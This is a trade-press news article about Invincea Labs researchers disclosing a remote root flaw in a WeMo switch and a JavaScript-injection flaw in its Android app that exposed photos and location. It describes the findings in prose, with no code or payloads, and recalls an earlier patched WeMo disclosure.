Security Firm to Detail Vulnerabilities in WeMo Switch and Android App

On Friday, at Black Hat Europe, an annual conference for the information security industry, Invincea Labs will detail two security vulnerabilities that it has discovered in smart-home products and an app made by WeMo—one of which would expose a user's smartphone photos and location to an attacker.
By Mary Catherine O'Connor

The researchers were unable to gain entry into WeMo's cloud-based servers as a vector into the devices. This suggests that, in order to obtain remote root access control, an attacker would need to gain entry to a home's Wi-Fi router or gain entrance into the home's network some other way. However, an attacker could also access a network via a poorly secured IoT device, such as the type of internet-connected cameras and DVRs that attackers leveraged in recent Distributed Denial of Service (DDoS) attacks on websites.

Tanen and Tenaglia both say the vulnerability in the Android smartphone app is likely more disconcerting to consumers than that of the WeMo switch device. That's because the hack they created would give access to much of the content stored on a user's smartphone, including its contacts and photos.

The WeMo companion mobile app
"What we did is we set the name of the [WeMo] device to be a malicious string containing JavaScript code," Tenaglia explains. Whenever the smartphone connects to that WeMo device, the app then executes the code embedded in the script.

"That code allows us to do anything that the app can do," Tanen says, "and the app can access the phone's camera, photos, contacts and location. So we've demonstrated that we can download all the photos from the phone and start beaconing the phone's location back to us."

Poor security settings on IoT devices have led to a number of recent high-profile breaches, including a DDoS attack that temporarily took down many popular websites last month. Yet, Tenaglia says, outside of not being able to access a website for a time, consumers have not been directly impacted by those breaches. In demonstrating the ability to not only infiltrate an app used to control an IoT device, but also access a smartphone's photos and other information that most people consider highly personal, Tenaglia and Tanen believe this exposure could make digital security around smart-home products a higher priority for consumers.

This is not the first time security researchers have discovered and revealed security holes in WeMo's smart-home products. In early 2014, IOActive, a Seattle-based security firm, revealed that hackers could access and control WeMo devices remotely, and also install their own malicious firmware, control the devices and access the home's computer network. WeMo quickly patched that security hole.

Simply enter a question for our experts.
Sign up for the RFID Journal Newsletter
We will never sell or share your information
RFID Journal LIVE! RFID in Health Care LIVE! LatAm LIVE! Brasil LIVE! Europe RFID Connect Virtual Events RFID Journal Awards Webinars Presentations